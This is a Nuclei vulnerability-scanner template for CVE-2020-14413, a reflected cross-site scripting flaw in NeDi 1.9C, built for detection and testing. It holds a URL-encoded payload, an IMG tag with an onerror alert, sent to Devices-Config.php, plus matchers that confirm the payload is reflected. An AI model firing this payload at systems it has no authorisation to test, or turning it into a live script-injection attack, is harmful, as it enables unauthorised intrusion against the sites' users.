nuclei-templates/cves/2020/CVE-2020-14413.yaml

42 lines
1.2 KiB
YAML

id: CVE-2020-14413
info:
name: NeDi 1.9C - Cross-Site Scripting
author: pikpikcu
severity: medium
description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily
bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
reference:
- https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
- https://nvd.nist.gov/vuln/detail/CVE-2020-14413
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-14413
cwe-id: CWE-79
tags: cve,cve2020,nedi,xss
requests:
- method: GET
path:
- '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(document.domain)>"
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
# Enhanced by mp on 2022/08/15